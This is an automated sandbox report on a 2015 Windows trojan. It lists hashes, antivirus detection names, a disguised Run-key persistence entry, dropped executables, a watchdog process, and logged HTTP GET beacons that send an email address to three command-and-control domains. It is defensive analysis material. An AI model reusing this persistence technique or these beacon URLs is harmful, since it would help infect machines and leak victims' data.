Analysis Date: 2015-07-29 20:35:25
MD5: af3540c21fcb6bb3cddaa3741765e9d4
SHA1: 168108af3d467e178d5daa9ba81b66a56ca64d97

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 8638c9363fcd629afe64a986a9ffd012 sha1: 05d29f4c24959118b67ba3b846925b16a030b8b0 size: 298496
Section .rdata: md5: 8892e4a00f3a3d69f5c738d6613d8b26 sha1: d530b59c3f8ddaef3758fa9aa89e7a856ba693cc size: 33280
Section .data: md5: e2455f582d189ed13441a5477f98910b sha1: 071e8be38785830cd0de894af3142b0aac42e82e size: 98304
Timestamp: 2015-01-29 10:19:52
Packer: Microsoft Visual C++ ?.?
PEhash: 99376b4e1cb549e826c74b1b7cae745f7c9b3607
IMPhash: 717d6cb6080ca0c99dafe39893a72ecc
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader15.12413
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: no_virus
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: no_virus
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Downloader-TLD [Trj]
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): BDS/Zegost.Gen4
AV Mcafee: Trojan-FEMT!AF3540C21FCB
AV Rising: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Engine Encryption Auto-Discovery Client Logs ➝ C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.ftb
Creates File: C:\Documents and Settings\Administrator\Application Data\quswpooewx\awmbjeualt.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe"

Network Details:

DNS: smokeinside.net
Type: A
50.63.202.34
DNS: partyexplain.net
Type: A
95.211.230.75
DNS: partybright.net
Type: A
50.63.202.44
HTTP GET: http://smokeinside.net/index.php?email=gheorghita.popa@primariacostinesti.ro&method=post&len
User-Agent:
HTTP GET: http://partyexplain.net/index.php?email=gheorghita.popa@primariacostinesti.ro&method=post&len
User-Agent:
HTTP GET: http://partybright.net/index.php?email=gheorghita.popa@primariacostinesti.ro&method=post&len
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 50.63.202.34:80
Flows TCP: 192.168.1.1:1032 ➝ 95.211.230.75:80
Flows TCP: 192.168.1.1:1033 ➝ 50.63.202.44:80

Raw Pcap
Strings